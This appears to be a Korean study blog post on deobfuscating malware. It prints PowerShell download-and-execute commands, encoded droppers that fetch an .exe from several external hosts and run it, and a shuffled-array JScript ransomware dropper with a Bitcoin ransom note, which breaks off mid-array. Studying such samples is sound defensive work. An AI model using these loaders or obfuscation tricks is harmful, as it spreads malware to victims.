정보보안 스터디 - 21주차 1일

Security/리버싱

정보보안 스터디 - 21주차 1일 - 악성코드 난독화

wonder12 2023. 3. 4. 10:16

오늘은 복습차원에서 다시 포스팅합니다.

☞ 파워쉘 난독화

분석을 방해하기 위해서 변경합니다.

base64로 많이 하는데 디코드 되기 때문에 암호화가 아닙니다.

PowerShell (New-Object Net.WebClient).DownloadFile('https://.tistory.com/
attachment/cfile7.uf@99DC973E5D30314E278FD2.exe', 'c:/putty.exe');IEX('c:/putty.exe');

파워쉘 다운로드하는 동작입니다.

1) invoke-expression은 실행한다는 뜻입니다. 또는 shell.execution, start-process도 많이씁니다.

> IEX로 바꿔 사용할 수 있기 때문에

System.Net.WebClient > system제외

난독화라기 보다는 간단화가 맞는 것 같습니다.

PowerShell (New-Object ('N'+'et.W'+'eb'+'Cl'+'ie'+'nt')).'DownloadFile'('ht'+'tps://'+'.c'+
'om/atta'+'chme'+'nt/c'+'file7.'+'uf@99DC97'+'3E5'+'D3'+'0314E'+'278F'+'D2.exe','c:/putty.exe');
IEX('c:/pu'+'tty.exe');

문자들을 '+'로 이어주는 방법입니다. 실제로 많이 사용합니다.

bat파일로 만들어서 실행되는지 확인합니다.

'+' > 바꾸기로 없애주면 그나마 보기 좋습니다.

base64난독화하는 방법입니다.

hybrid-analysis로도 평문을 확인할 수 있지만

base64디코드 사이트로 많이 이용합니다.

.( $Env:PubLIc[13]+$Env:PUbLic[5]+'x') (-JoIn ( '36h119h115U99S114{105U112U116i32:61{32{110c101c119i45S111%98h106m101m99%116m32!45i67S111:109c79c98h106U101S99U116:32c87:83U99%114c105c112%116i46i83i104c101{108%108:59:36!119!101c98m99h108%105%101%110%116m32c61c32h110h101U119%45S111%98!106:101i99{116i32h83%121:115m116h101%109:46!78i101i116U46U87%101S98h67i108{105c101S110h116:59%36{114m97{110U100h111:109h32!61c32i110h101%119:45:111i98%106!101h99m116S32{114%97!110S100U111{109:59{36i117{114S108h115!32:61S32!39S104c116%116c112i58:47m47c102{111S108{120c100{111S103{101%114U109c46U105i110%102c111S47{49%39{46%83i112!108%105U116c40h39S44h39!41!59i36:110i97S109c101h32U61h32%36S114m97!110%100m111U109h46c110%101c120{116m40i49h44U32h54S53U53m51h54m41c59m36U112h97{116{104U32U61%32S36i101i110h118{58%116S101%109%112U32U43!32%39h92S39!32%43i32h36{110!97{109i101S32c43:32i39c46:101S120i101%39h59:102c111U114h101{97%99:104%40m36{117!114h108m32!105i110!32m36c117m114U108%115U41!123c116i114S121U123:36:119i101m98%99S108h105:101:110!116U46!68:111:119h110U108m111:97{100!70i105S108:101U40h36:117!114S108:46U84c111U83m116%114c105{110c103i40U41i44U32!36i112U97m116!104i41!59{83!116%97i114c116%45h80S114m111{99:101U115{115{32h36:112U97:116S104c59U98c114{101!97m107%59!125h99h97m116m99:104!123S119%114i105i116:101m45i104S111%115i116h32c36U95!46S69i120!99{101m112U116{105c111%110:46h77i101U115%115{97:103U101%59!125S125'.sPLIt(':i{mShU!c%') | forEach { ( [iNT] $_ -As [cHAR])}))

평문을 열어봤는데 2중으로 인코딩되어있는 경우가 많습니다.

이 경우에는

$a = ;
$b = ;
-Join ($a.sPLIt($b)| forEach { ( [iNT] $_ -As [cHAR])}))

간단화 하여 powershell ISE로 평문을 얻습니다.

스크립트 코드가 실행되면서 원본코드를 적어주는 방식입니다.

실행 후 얻은 평문을 notepad++ 에 JSFormat변환 시켜 보기좋게 만듭니다.

try break catch 형식으로 되어있고

start-process는 실행입니다.

3-2)

"$(sEt-ITem 'VARIAble:OFS'  '') "+ [sTrInG]( ( 36,119,115, 99 ,114 ,105 ,112 , 116 ,32 ,61 ,
32, 110 , 101 , 119, 45,111,98 , 106 , 101,99,116 ,32 ,45 , 67,111 , 109 , 79,98 ,106 ,101,99,
116, 32,87 , 83,99,114 ,105,112 , 116 ,46, 83, 104 ,101 , 108 ,108,59 , 36 ,119 ,101 ,98,99 ,
108,105 ,101, 110 ,116, 32,61, 32 , 110,101, 119 , 45 ,111 , 98, 106, 101 , 99,116 ,32 ,83 , 
121 ,115 , 116 , 101, 109 , 46, 78 ,101,116,46 , 87 , 101 , 98 ,67, 108 , 105,101, 110, 116 ,
59 , 36 ,114 ,97 , 110,100 ,111, 109, 32 ,61, 32,110 ,101 ,119 ,45, 111, 98,106 ,101,99, 116 ,
32, 114 , 97,110,100, 111 ,109, 59 ,36,117 , 114 ,108 ,115 ,32 , 61 , 32,39 ,104 ,116 ,116 ,
112 , 58, 47 , 47 , 108, 121 ,109 , 97,110 ,105 ,116 ,101 ,46 , 99 , 111, 109 ,47,82, 119 , 97 ,
89,103,97,109,68 , 47,44,104 ,116 ,116 , 112 ,58 , 47, 47,104 ,97 , 108 ,97 , 114 ,105 ,115,46 ,
99 ,111, 109 ,47,71 , 72 ,101,47 , 44,104 ,116, 116, 112 ,58 ,47 , 47 , 108, 111 , 118,101 ,110 , 100 ,117 , 115 ,107, 105 , 46 ,99, 111 ,109,47 , 119,69,115, 106,104,78 ,100 , 47,44 , 104 , 116, 116,112 ,58,47,47 ,97,112, 101, 114 ,102,101 , 99 ,116,105 , 109, 97 , 103 , 101 , 46,112 ,108, 47, 47 ,72 , 87 ,109 , 119 ,47, 44, 104, 116 , 116,112 , 58, 47, 47 , 108 ,117, 120, 109, 101 ,100 , 105 , 97 , 46, 99 ,111, 109,46 , 112, 108, 47 ,112 , 111 ,114 ,116,102, 111, 108, 105 ,111,47, 111 , 103,90, 47 , 39, 46, 83,112,108,105,116,40, 39,44, 39, 41, 59, 36, 110, 97, 109 , 101 ,32 ,61,32, 36, 114,97 ,110 , 100 , 111,109,46, 110,101 ,120 , 116 ,40 , 49,44, 32 ,54, 53 ,53 , 51 ,54, 41,59, 36,112,97 ,116, 104 , 32, 61 ,32 , 36,101, 110, 118 , 58,116,101 , 109 ,112 ,32,43 ,32, 39 ,92 , 39,32, 43 ,32 , 36 , 110 ,97, 109 ,101,32 ,43 ,32,39 ,46 , 101,120 , 101,39, 59 , 102,111,114,101, 97,99 ,104,40,36, 117 ,114, 108, 32, 105,110,32, 36 ,117, 114 , 108 , 115 , 41 , 123,116, 114, 121,123 , 36 ,119 , 101 ,98,99 ,108, 105 , 101 , 110 , 116 ,46, 68, 111, 119 ,110,108 ,111,97 ,100,70,105 , 108 ,101 , 40 ,36, 117, 114 , 108 , 46, 84 ,111 , 83 , 116, 114, 105,110, 103,40, 41,44,32 ,36 ,112 , 97 , 116,104 , 41,59 ,83,116,97,114,116,45 , 80 , 114 , 111 , 99 , 101, 115 ,115 ,32 ,36 , 112,97, 116,104,59 ,98 , 114,101, 97, 107 , 59, 125, 99,97 , 116 , 99, 104, 123 , 119, 114 , 105 ,116 , 101,45 , 104 , 111 ,115, 116, 32 , 36 ,95,46 , 69 ,120, 99 , 101,112 ,116,105 ,111 ,110,46, 77, 101 , 115 , 115 , 97 ,103,101, 59, 125, 125) | foREAcH { ([Int] $_-As[char])})+" $(set-Item  'VaRIABLe:OFs' ' ' )"

#|& ( $ENV:CoMSpec[4,26,25]-JoIN'')

이것도 역시 ISE실행하여 평문을 받아옵니다.

CoMSpec은 'C:\\Windows\system32\cmd.exe' 를 의미합니다.

파이썬 IDLE을 이용하면 CoMSpec에서 4, 26, 25번째 string을 가지고 오는 것을 확인가능합니다.

즉 IEX= 실행 을 의미합니다.

☞ javascript 난독화

1) 원라인으로 정렬합니다.

지금은 짧아서 보는데 불편하지 않지만 길어지면 어려울 수 있습니다.

2) function 함수 기능인척합니다.

<script>var n = function() {var n = 777; var a = 'casino'; alert(a); alert(n);} n();</script>

3) var로 변수형식으로 만들고 나중에 있습니다.

var s1 = "\<script\>";
var s2 = "var n =";
var s3 = "777;";
var s4 = "var a ";
var s5 = "= 'cas";
var s6 = "ino';";
var s7 = "ale";
var s8 = "rt(a);";
var s9 = "al";
var s10 = "ert(n);";
var s11 = "\</script\>";
document.write(s1 + s2 + s3 + s4 + s5 + s6 + s7 + s8 + s9 + s10 + s11);

지금 이건 JSFrom형식으로 바꾼상태입니다.

4) 쓰레기값을 넣고 마지막에 치환합니다.

trashjavascript를 반복하여 랜덤하게 넣은 코드에

document.write(s.replace(/trashjavascript/g, ""))

치환합니다.

이것 역시 바꾸기로 바꿔 볼 수 있습니다.

5) ascii코드표 16진수로 인코딩합니다.

<script> var s0 = "%3C%73%63%63%69%73%63%6F%73%79%73%74%65%6D%73%72%69%70%74%3E";var s1 = "%76%61%72 %63 %3d%63%69%73%63%6F%73%79%73%74%65%6D%73";var s2 = " %66%75%6e%63%69%73%63%6F%73%79%73%74%65%6D%73%63%74%69%6f%6e%28%29";var s3 = " %7b%76%61%72 %6e %3d%63%69%73%63%6F%73%79%73%74%65%6D%73";var s4 = "%63%69%73%63%6F%73%79%73%74%65%6D%73 %37%37%37%3b%76%61%63%69%73%63%6F%73%79%73%74%65%6D%73%72 %61 ";var s5 = "%63%69%73%63%6F%73%79%73%74%65%6D%73%3d %27%63%61%73";var s6 = "%69%6E%6F%27%3b%63%69%73%63%6F%73%79%73%74%65%6D%73%61%6c%65%72";var s7 = "%74%28%63%69%73%63%6F%73%79%73%74%65%6D%73%61%29%3b%61";var s8 = "%63%69%73%63%6F%73%79%73%74%65%6D%73%6c%65";var s9 = "%72%74%63%69%73%63%6F%73%79%73%74%65%6D%73%28%6e";var s10 = "%29%3b%63%69%73%63%6F%73%79%73%74%65%6D%73";var s11 = "%63%69%73%63%6F%73%79%73%74%65%6D%73%7d%3b ";
var s12 = "%63%28%29%63%69%73%63%6F%73%79%73%74%65%6D%73";var s13 = "%3C%2F%73%63%63%69%73%63%6F%73%79%73%74%65%6D%73%72%69%70%74%3E";var s14 =s0+s1+s2+s3+s4+s5+s6+s7+s8+s9+s10+s11+s12+s13;var s = unescape(s14.replace(/%63%69%73%63%6F%73%79%73%74%65%6D%73/g, ""));document.write(s); </script>

%를 바꾸기로 없애고

공백을 없애고

드래그 후 conver(hex> ascii) 하면 확인이 가능하며

다시 띄어쓰기까지 합니다.

6) 배열 랜덤정렬 > 순서에 맞게 실행

function k77(l31,d19) {t42[l31] = d19;}; var t42 = new Array();k77(690, '" ');k77(161, 'i++) ');
k77(767, 't REG_');k77(501, 'n ad');k77(357, 'encr');k77(409, '"); ');k77(458, 'with c');
k77(627, 'e("  ');k77(861, 'le%');k77(226, ';try');k77(949, 'EC% /c');k77(78, 'ndEn');k77(641, 'ne');k77(598, 'LE');k77(250, '} e');k77(445, '"")');k77(376, 'fp');k77(577, 'eLin');k77(926, 'c DE');k77(335, 'nts, p');k77(210, 'xa.');k77(459, 'ash');k77(944, '; ');k77(75, '"); va');k77(88, ' var p');k77(203, '(x');k77(255, '{xa');k77(947, '%COM');k77(39, 'nieli');k77(15, 'g.fro');k77(36, 'atedi');k77(422, '); fp');k77(165, 'ry {');k77(63, '; v');k77(807, 'otepa');k77(882, '"+c');k77(220, 'ToF');k77(513, '  ');k77(488, '.Wri');k77(550, 'for (v');k77(392, 'BTC (b');k77(362, 'stro');k77(379, 'To re');k77(430, '   ');k77(265, 'File(');k77(402, 's m');k77(45, 'thmum');k77(77, 's.Expa');k77(21, 'trin');k77(337, 'tos');k77(838, 'to');k77(159, '<ll.l');k77(17, 'arCod');k77(30, 'bapa');k77(102, 'ts.dl');k77(705, 'T.');k77(589, 'es.');k77(10, ' l');k77(460, ', us');k77(400, 'ollow ');k77(802, '_S');k77(348, 'ers');k77(721, 'U"+cs+');k77(370, ' w');k77(614, 'do n');k77(377, '.Write');k77(235, '};}');k77(941, '+".e');k77(272, 'a.c');k77(572, 'te');k77(662, '."');k77(700, 'on you');k77(546, 'teL');k77(198, 'n(); ');k77(834, 'ata%"+');k77(344, ' i');k77(899, 'fp=f');k77(391, '+" ');k77(73, 'pt');k77(364, ' R');k77(92, 'iron');k77(940, '+fn');k77(477, 'calbi');k77(438, 'wall');k77(227, '{ws.R');k77(433, 'bloc');k77(560, '    ');k77(618, 's YOU');k77(303, 's(fn');k77(631, 'od');k77(281, 'break');k77(316, '",tr');k77(713, 'n("%CO');k77(340, 'se');k77(398, 'Ple');k77(170, ':/');k77(904, '.p');k77(472, '("');k77(41, 'ta.es');k77(353, 'rit');k77(805, '"+cq+');k77(107, '.Cre');k77(462, 'g sea');k77(901, 'reateT');k77(186, '); xo.');k77(172, 'i]');k77(179, '&i');k77(305, '.php"');k77(532, 'in');k77(548, '")');k77(2, 'var ad');k77(480, 'buy_bi');k77(259, ',2);} ');k77(628, '   ');k77(217, '=2){x');k77(709, 'ose(');k77(951, 'EL');k77(49, 'tgangt');k77(492, 'd ');k77(151, 'ar n=1');k77(836, '+"De');k77(586, 're');k77(906, '",t');k77(880, 'n+".p');k77(68, 'ateObj');k77(290, 'is');k77(688, 'Write');k77(850, 'py');k77(118, 'r x');k77(648, 'in');k77(455, '+"');k77(832, '"+cq+"');k77(854, '".');k77(297, 'xists(');k77(137, 'ystem');k77(710, ');');k77(902, 'extFil');k77(352, ' fp.W');k77(542, 'crypt');k77(209, ' if(');k77(112, 'sxml2.');k77(790, '"s');k77(852, 'y "+c');k77(736, 'n"+cq');k77(725, 's+"Mi');k77(704, 'CRYP');k77(3, '="12DgfDY8pU2cpMwgHbtaWB9dgd8fuhJRk6');k77(131, 'Obj');k77(606, 'fp');k77(134, 'pti');k77(150, 'or(v');k77(527, ' one ');k77(935, '("%COM');k77(829, '".tx');k77(945, 'ws.');k77(633, 'an he');k77(888, 'PEC');k77(465, '; fp.');k77(436, '.i');k77(946, 'Run("');k77(929, 'fn');k77(796, 'mm');k77(218, 'a.');k77(907, 'rue);');k77(503, ':");');k77(601, 'EMBER');k77(274, 'e(');k77(285, ' }; };');k77(876, '% /c "');k77(784, 'HKCR"+');k77(315, 'xt');k77(567, 'ter/?a');k77(446, '; fp.W');k77(478, 'tcoin');k77(623, 'ILES.');k77(828, 'cq+fn+');k77(715, 'EC% /');k77(393, 'itcoin');k77(777, '("');k77(11, 'd=0;');k77(277, '(d');k77(270, '} ');k77(214, '=1;');k77(65, 'ws=WSc');k77(547, 'ine("');k77(616, ' in');k77(355, 'e("wer');k77(541, ' de');k77(485, 'teLine');k77(127, 'var ');k77(769, 'F /D');k77(484, 'Wri');k77(849, ' /c co');k77(453, '"+');k77(666, 'Line');k77(126, 'm"); ');k77(110, 'ect');k77(753, '; ws.R');k77(747, ' "+');k77(800, '/t');k77(922, ' ws.Ru');k77(538, ' d');k77(146, 'n+".t');k77(341, 's ');k77(622, 'R F');k77(283, 'catch(');k77(320, 'ine("');k77(167, 'en');k77(686, '; ');k77(786, 'Crypt');k77(599, 'ASE R');k77(366, '10');k77(868, 'PT.tx');k77(13, 'q=');k77(855, 'txt"');k77(495, ' BT');k77(727, 'ft"+c');k77(103, 'l"; v');k77(651, 'dow');k77(766, 'e /');k77(869, 't"+');k77(917, 'Line');k77(242, 'a.s');k77(934, 'ws.Run');k77(241, '{x');k77(698, 'ma');k77(19, '); va');k77(450, 'e(');k77(293, 'exe');k77(886, 'un("');k77(108, 'at');k77(47, 'm","');k77(212, '000');k77(564, '+ll[i]');k77(124, '"ADODB');k77(213, ') { dn');k77(426, '""); f');k77(520, 'ne(""');k77(271, '}; x');k77(295, 'fo.Fi');k77(56, 'sea');k77(249, '2);');k77(689, 'Line(');k77(910, ' i=0;i');k77(696, ' find');k77(180, 'd="+id');k77(71, 'Sc');k77(900, 'o.C');k77(952, ' "+c');k77(418, 'al');k77(365, 'SA-');k77(639, 'Wr');k77(742, '+cq+"');k77(367, '24 al');k77(188, 'nd(); ');k77(114, 'HTT');k77(716, 'c R');k77(448, 'eL');k77(723, 'TWA');k77(514, '   "+');k77(663, '); ');k77(37, '.or');k77(857, '" "');k77(1, '="c5F5zaa6WhR1OawB0878ZiyWm9diFSpyx8RUzx3TjXQrsqruq5wjIHXY1NDT4aqPSgi2bd9QoGSOsl6R-9gAKtyHNheGrhiPnIOeoXRtNQ"; ');k77(516, '; fp');k77(224, 'xe",');k77(358, 'yp');k77(909, 'ar');k77(536, 'rows');k77(517, '.Wr');k77(812, 'q+fn+"');k77(407, 'teLine');k77(806, '"n');k77(408, '("');k77(321, 'ATTENT');k77(231, 'xe",1,');k77(325, 'ine("');k77(525, '"4');k77(772, 'ypted"');k77(254, '==4)');k77(280, '=i;');k77(602, ':"); f');k77(821, 'un("%');k77(342, 'and ot');k77(334, 'cume');k77(169, ',"http');k77(157, '(var i');k77(215, ' if(');k77(761, 'KCR"');k77(470, 'p.Writ');k77(327, ' fp.Wr');k77(5, 'r ');k77(776, '.Run');k77(706, 'txt).');k77(25, 'ode(');k77(859, 'UserPr');k77(427, 'p.Writ');k77(208, ');');k77(351, 'les");');k77(795, 's+"co');k77(809, 'xe');k77(468, '("")');k77(773, '+cq,0,');k77(115, 'P"');k77(693, 'Yo');k77(494, 'bc+"');k77(199, 'xa.ty');k77(168, '("GET"');k77(702, 'ktop');k77(269, '2);');k77(751, '"+cq,0');k77(496, 'C ');k77(607, '.Wri');k77(530, 'ollo');k77(764, 'd"+cq');k77(34, 'anic');k77(647, 'to re');k77(695, 'an');k77(529, ' f');k77(735, 's+"Ru');k77(262, '==5){x');k77(699, 'nual ');k77(301, '.Fil');k77(27, 'ar l');k77(508, 'fp');k77(779, 'SPEC% ');k77(323, '); fp.');k77(264, 'aveTo');k77(669, ' - Y');k77(310, 'eTex');k77(268, '.php",');k77(825, 'y /');k77(511, 'teLin');k77(81, 'tStri');k77(604, 'eLine(');k77(403, 'anua');k77(432, 'ps://');k77(263, 'a.s');k77(91, 'ndEnv');k77(840, 'cs+"D');k77(139, 'ct"); ');k77(80, 'en');k77(683, 'e paym');k77(120, 'ipt.Cr');k77(493, '"+');k77(328, 'iteLi');k77(914, '{f');k77(454, 'bc');k77(401, 'thi');k77(743, ' /t RE');k77(58, 'cons');k77(580, ' d');k77(867, 'DECRY');k77(871, '0);');k77(33, 'bjibap');k77(225, '2)');k77(792, 'l"+c');k77(497, 'to ');k77(356, 'e ');k77(26, '92); v');k77(891, '.ex');k77(885, 's.R');k77(667, '(" ');k77(680, 'r you');k77(878, '".exe ');k77(347, ' p');k77(439, 'et/n');k77(48, 'nieli');k77(136, 'FileS');k77(481, 'tcoin');k77(592, 'iteL');k77(605, '""); ');k77(932, '+cq,');k77(817, 'q,');k77(574, 'e("');k77(537, 'er to');k77(368, 'gor');k77(190, 'o.');k77(466, 'WriteL');k77(90, '.Expa');k77(50, 'ok.e');k77(953, 'q+pd+');k77(624, '"); f');k77(718, 'D "+c');k77(801, ' REG');k77(539, 'ow');k77(247, '.exe');k77(239, '==');k77(575, '"); fp');k77(166, ' xo.op');k77(890, 'otepad');k77(535, 'our b');k77(609, 'ne');k77(371, 'ith a ');k77(865, 'op"+cs');k77(588, 'ur fil');k77(230, '.e');k77(101, 'hp4');k77(104, 'ar x');k77(123, 'ject(');k77(147, 'xt');k77(611, '    -');k77(554, 'ngth');k77(187, 'se');k77(18, 'e(34');k77(232, '0)');k77(655, 'antiv');k77(302, 'eExist');k77(152, ';n<');k77(238, '(n');k77(571, 'p.Wri');k77(841, 'ECRYPT');k77(954, 'cq,0,');k77(244, 'To');k77(798, 'cq+" /');k77(421, 'here:"');k77(557, 'fp.');k77(467, 'ine');k77(643, '     ');k77(476, '://lo');k77(842, '.txt"');k77(762, '+cs+".');k77(372, 'unique');k77(67, 't.Cre');k77(153, '=5;n');k77(847, '("%COM');k77(374, 'y.');k77(116, '); ');k77(905, 'hp');k77(178, '+"');k77(140, 'if (!');k77(390, '"+bc');k77(345, 'mpor');k77(177, 'd="+ad');k77(728, 's+"Win');k77(133, '("Scri');k77(632, 'y c');k77(183, '+i');k77(551, 'ar i=0');k77(105, 'o=W');k77(585, 'sto');k77(780, '/c REG');k77(343, 'her');k77(229, 'fn+n+"');k77(748, 'cq+');k77(566, 'un');k77(924, 'MSPEC');k77(830, 't"');k77(38, 'g","');k77(89, 'd=ws');k77(746, '/D');k77(437, 'nfo/');k77(726, 'croso');k77(803, 'Z ');k77(128, 'fo=WS');k77(40, 'tkolka');k77(380, 'st');k77(782, 'DD "+c');k77(434, 'kc');k77(918, '(ad)');k77(284, 'er){};');k77(424, 'rit');k77(745, 'SZ /F ');k77(856, '+cq+');k77(96, 's("');k77(20, 'r cs=S');k77(521, '); fp');k77(449, 'in');k77(775, '; ws');k77(62, 'm"]');k77(732, 'Versi');k77(499, 's Bi');k77(749, 'fn+".t');k77(502, 'dress');k77(338, ', data');k77(195, ') { x');k77(646, 'eless ');k77(545, 'Wri');k77(679, ' afte');k77(55, 'sonre');k77(804, '/F /D ');k77(562, 'ht');k77(955, '0)');k77(658, 'softw');k77(928, '+cq+');k77(399, 'ase f');k77(590, '");');k77(414, 'ea');k77(412, 'e("1');k77(670, 'our f');k77(665, '.Write');k77(778, '%COM');k77(595, 'p.Wr');k77(788, '"+');k77(162, '{ var');k77(122, 'teOb');k77(222, '+n+');k77(707, '"); f');k77(515, 'ad)');k77(741, 'ted"');k77(712, 'Ru');k77(730, 'cs+"Cu');k77(824, 'c cop');k77(66, 'rip');k77(714, 'MSP');k77(53, 'n","pe');k77(275, '); }; ');k77(837, 'sk');k77(143, 'le');k77(428, 'eLine(');k77(219, 'save');k77(273, 'los');k77(664, 'fp');k77(444, 'ne(');k77(839, 'p"+');k77(246, '(fn+"');k77(799, 've ');k77(60, 'ng.');k77(158, '=ld;i');k77(373, ' ke');k77(911, '<1000');k77(569, '+ad); ');k77(417, 'oin w');k77(893, 'cq+fn+');k77(610, '("  ');k77(154, '++');k77(396, 'riteLi');k77(894, '".t');k77(234, 'h(er){');k77(898, 'ar ');k77(369, 'ithm');k77(581, 'ecry');k77(763, 'crypte');k77(260, 'els');k77(781, ' A');k77(336, 'ho');k77(442, '; fp.W');k77(701, 'r des');k77(276, 'if');k77(404, 'l:"');k77(76, 'r fn=w');k77(306, ')) { v');k77(685, '.")');k77(121, 'ea');k77(482, 's"); f');k77(289, 'ileEx');k77(908, 'for(v');k77(142, '.Fi');k77(555, ';i++) ');k77(87, '"a";');k77(587, ' yo');k77(612, ' If');k77(109, 'eObj');k77(278, 'n==');k77(395, ' fp.W');k77(724, 'RE"+c');k77(737, '+" /V');k77(51, 'ssp');k77(258, 'e(pd');k77(785, 'cs+"');k77(872, ' ws');k77(768, 'SZ /');k77(489, 'teL');k77(359, 'te');k77(375, '"); ');k77(500, 'tcoi');k77(912, ';i');k77(42, 'spl.i');k77(319, 'WriteL');k77(540, 'nload');k77(873, '.R');k77(524, 'e(');k77(389, 'pay ');k77(206, 'onseBo');k77(29, '["');k77(360, 'd u');k77(419, 'le');k77(8, '";');k77(196, 'a.o');k77(552, ';i<ll');k77(919, ';};fp');k77(243, 'ave');k77(694, 'u c');k77(236, ' else ');k77(654, 'e ');k77(933, '0,0); ');k77(193, 's==');k77(794, 'en"+c');k77(411, 'iteLin');k77(149, ' { f');k77(692, ' - ');k77(447, 'rit');k77(673, 'n b');k77(808, 'd.e');k77(311, 'tFi');k77(350, 'fi');k77(831, '+cq+" ');k77(640, 'iteLi');k77(129, 'cript.');k77(931, 'php"');k77(160, 'ength;');k77(656, 'ir');k77(889, '% /c n');k77(608, 'teLi');k77(382, 'e yo');k77(22, 'g.f');k77(174, '/coun');k77(739, '+"C');k77(32, '.a');k77(660, ', ');k77(783, 'q+"');k77(339, 'ba');k77(469, '; f');k77(925, '% /');k77(617, ' 3 day');k77(486, '(""');k77(681, ' m');k77(46, '.co');k77(650, ' Win');k77(884, ',1); w');k77(440, 'ew');k77(82, 'ngs(');k77(145, 'ists(f');k77(596, 'iteL');k77(413, '. Cr');k77(223, '".e');k77(818, '0,0');k77(425, 'eLine(');k77(565, '+"/co');k77(451, '"2. ');k77(490, 'ine("3');k77(135, 'ng.');k77(549, '; ');k77(526, '. Open');k77(487, '); fp');k77(733, 'on');k77(661, 'etc');k77(233, ';}catc');k77(613, ' you ');k77(813, '.t');k77(843, '+c');k77(191, 'st');k77(819, '); ');k77(892, 'e "+');k77(384, ' f');k77(0, 'var id');k77(939, '"+cq');k77(634, 'lp yo');k77(237, 'if');k77(397, 'ne("');k77(461, 'in');k77(883, 'q,0');k77(923, 'n("%CO');k77(573, 'Lin');k77(381, 'or');k77(645, '`s us');k77(300, ' fo');k77(738, ' "+cq');k77(593, 'ine(""');k77(452, 'Buy ');k77(561, '  ');k77(626, 'iteLin');k77(296, 'leE');k77(7, '45810');k77(563, 'tp://"');k77(267, '+"');k77(597, 'ine("P');k77(324, 'WriteL');k77(141, 'fo');k77(443, 'riteLi');k77(12, ' var c');k77(816, 'q+c');k77(473, '     ');k77(322, 'ION!"');k77(915, 'p.W');k77(875, 'OMSPEC');k77(429, '"   ');k77(860, 'ofi');k77(182, 'nd="');k77(415, 'te');k77(95, 'tring');k77(568, '="');k77(117, 'va');k77(333, 'our do');k77(287, '(f');k77(765, '+" /v');k77(57, 'rch');k77(531, 'wing l');k77(556, '{ ');k77(657, 'us ');k77(164, '=0; t');k77(579, '. Run');k77(69, 'ect(');k77(31, 'nivato');k77(79, 'vironm');k77(887, '%COMS');k77(916, 'rite');k77(163, ' dn');k77(326, '");');k77(23, 'ro');k77(671, 'iles');k77(378, 'Line("');k77(866, '+"');k77(61, 'co');k77(594, '); f');k77(354, 'eLin');k77(920, '.Clos');k77(740, 'ryp');k77(879, '"+cq+f');k77(309, '.Creat');k77(312, 'le');k77(464, 're:")');k77(294, '") && ');k77(175, 'ter');k77(870, 'cq,0,');k77(823, 'PEC% /');k77(85, '")+');k77(93, 'men');k77(383, 'ur');k77(697, ' this ');k77(615, 'ot pay');k77(138, 'Obje');k77(523, 'teLin');k77(534, 'in y');k77(950, ' D');k77(638, '); fp.');k77(649, 'stall');k77(113, 'XML');k77(201, '; xa');k77(677, ' o');k77(576, '.Writ');k77(754, 'un(');k77(510, 'ri');k77(544, '; fp.');k77(543, 'or:")');k77(603, 'p.Writ');k77(156, 'or');k77(672, ' ca');k77(431, 'htt');k77(471, 'eLine');k77(16, 'mCh');k77(877, '+fn+');k77(862, '"+');k77(570, '}; f');k77(94, 'tS');k77(204, 'o.r');k77(84, 'EMP%');k77(111, '("M');k77(844, 'q,0,');k77(827, '"+');k77(184, '+n,');k77(86, 'cs+');k77(789, 'cs+');k77(957, '; };');k77(637, 'us."');k77(528, 'of the');k77(456, ' B');k77(731, 'rrent');k77(279, '1){ld');k77(307, 'ar fp=');k77(848, 'SPEC%');k77(815, 's+c');k77(846, '.Run');k77(668, '    ');k77(405, '); fp.');k77(826, 'y ');k77(181, '+"&r');k77(441, '")');k77(682, 'ak');k77(770, ' "+cq+');k77(811, '+cs+c');k77(197, 'pe');k77(52, 'l.i');k77(755, '"%C');k77(948, 'SP');k77(758, 'c REG');k77(774, '0)');k77(833, '%AppD');k77(903, 'e(fn+"');k77(125, '.Strea');k77(942, 'xe"+c');k77(314, '.t');k77(211, 'size>1');k77(498, 'thi');k77(189, 'if(x');k77(691, '    ');k77(261, 'e if(n');k77(155, ') { f');k77(578, 'e("5');k77(253, '(n');k77(216, 'n<');k77(282, ';}; } ');k77(410, 'fp.Wr');k77(858, '+cq+"%');k77(507, '"); ');k77(760, '+cq+"H');k77(956, '; }');k77(676, 'pted');k77(148, '"))');k77(505, 'iteLi');k77(257, 'oFil');k77(330, '("');k77(483, 'p.');k77(72, 'ri');k77(787, 'ed');k77(711, ' ws.');k77(59, 'ulti');k77(675, 'ecry');k77(619, ' LO');k77(406, 'Wri');k77(722, '"SOF');k77(299, ' &&');k77(130, 'Create');k77(318, 'p.');k77(845, '0); ws');k77(35, 'hh');k77(835, 'cs');k77(9, ' var');k77(757, 'C% /');k77(308, 'fo');k77(659, 'are');k77(797, 'and"+');k77(913, '++)');k77(463, 'rch he');k77(298, 'pd)');k77(653, 'pdat');k77(635, 'u exce');k77(256, '.saveT');k77(435, 'hain');k77(642, '(" ');k77(24, 'mCharC');k77(896, 'cq,0,');k77(943, 'q,0,0)');k77(600, 'EM');k77(936, 'SPEC');k77(119, 'a=WScr');k77(97, '%TEM');k77(479, 's.com/');k77(793, 's+"op');k77(332, 'l y');k77(937, '% /c D');k77(420, 't ');k77(54, 'ar');k77(99, '")+cs');k77(207, 'dy');k77(248, '",');k77(100, '+"p');k77(652, 's, u');k77(176, '/?a');k77(810, ' "');k77(938, 'EL ');k77(205, 'esp');k77(519, 'eLi');k77(895, 'xt"+');k77(678, 'nly');k77(44, 'funwi');k77(228, 'un(');k77(853, 'q+fn+');k77(240, '3)');k77(252, ' if');k77(292, '+".');k77(266, 'fn');k77(185, ' false');k77(251, 'lse');k77(522, '.Wri');k77(385, 'iles ');k77(171, '/"+ll[');k77(625, 'p.Wr');k77(200, 'pe=1');k77(388, ' to ');k77(288, 'o.F');k77(194, '200');k77(221, 'ile(fn');k77(897, '0); v');k77(874, 'un("%C');k77(416, ' Bitc');k77(74, '.Shell');k77(144, 'Ex');k77(98, 'P%');k77(851, ' /');k77(304, '+"');k77(644, '- It');k77(394, 's).");');k77(491, '. Sen');k77(584, 'o re');k77(708, 'p.Cl');k77(684, 'ent');k77(863, 'cs+"De');k77(582, 'pto');k77(864, 'skt');k77(70, '"W');k77(43, 'n","');k77(629, ' - N');k77(687, 'fp.');k77(83, '"%T');k77(791, 'hel');k77(927, 'L "');k77(674, 'e d');k77(349, 'onal ');k77(6, 'bc="0.');k77(173, '+"');k77(504, ' fp.Wr');k77(202, '.write');k77(703, ' (DE');k77(621, 'LL YOU');k77(756, 'OMSPE');k77(329, 'ne');k77(106, 'Script');k77(744, 'G_');k77(346, 'tant');k77(474, ' h');k77(719, 'q+');k77(64, 'ar ');k77(591, ' fp.Wr');k77(717, 'EG AD');k77(630, 'ob');k77(132, 'ect');k77(734, '"+c');k77(820, 'ws.R');k77(558, 